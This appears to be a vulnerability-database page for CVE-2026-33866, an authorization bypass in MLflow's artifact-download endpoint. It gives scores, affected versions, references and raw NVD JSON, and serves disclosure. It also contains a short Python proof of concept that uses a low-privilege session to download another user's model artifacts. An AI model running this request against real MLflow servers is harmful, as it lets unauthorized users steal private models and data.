CVE-2026-33866

Description

MLflow is vulnerable to an authorization bypass affecting the AJAX endpoint used to download saved model artifacts. Due to missing access‑control validation, a user without permissions to a given experiment can directly query this endpoint and retrieve model artifacts they are not authorized to access. This issue affects MLflow version through 3.10.1

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* - VULNERABLE

MLflow <= 3.10.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target MLflow instance URL
target_host = "http://target-mlflow-server:5000"
# The vulnerable AJAX endpoint for downloading artifacts
endpoint = "/ajax-api/2.0/mlflow/artifacts/download"

# Attacker's low-privilege session cookie (obtained via login)
attacker_cookie = "mlflow-session-cookie=low_priv_user_token"

# Headers including the session
headers = {
    "Cookie": attacker_cookie,
    "User-Agent": "Mozilla/5.0"
}

# Parameters specifying the unauthorized resource to download
# run_id: The ID of the experiment/model the attacker should not access
# path: The specific file within the artifacts
params = {
    "run_id": "sensitive_run_id_uuid",
    "path": "model/data.pkl"
}

# Send the GET request to exploit the bypass
response = requests.get(target_host + endpoint, headers=headers, params=params)

if response.status_code == 200:
    print("[+] Exploit successful! Downloaded artifact.")
    # Save the stolen artifact
    with open("stolen_artifact.pkl", "wb") as f:
        f.write(response.content)
else:
    print(f"[-] Failed to download. Status: {response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33866
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33866
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33866/
[4] VulDB https://vuldb.com/cve/CVE-2026-33866
[5] https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors
[6] https://cert.pl/en/posts/2026/04/CVE-2026-33865/
[7] https://github.com/mlflow/mlflow/pull/21708

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33866", "sourceIdentifier": "[email protected]", "published": "2026-04-07T13:16:47.000", "lastModified": "2026-04-20T18:45:16.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MLflow is vulnerable to an authorization bypass affecting the AJAX endpoint used to download saved model artifacts. Due to missing access‑control validation, a user without permissions to a given experiment can directly query this endpoint and retrieve model artifacts they are not authorized to access.\n\n \nThis issue affects MLflow version through 3.10.1"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.10.1", "matchCriteriaId": "C1C49CD5-5BB0-422B-9A71-5A6832DF6713"}]}]}], "references": [{"url": "https://afine.com/blogs/attacking-mlflow-how-ml-artifacts-become-attack-vectors", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://cert.pl/en/posts/2026/04/CVE-2026-33865/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/mlflow/mlflow/pull/21708", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}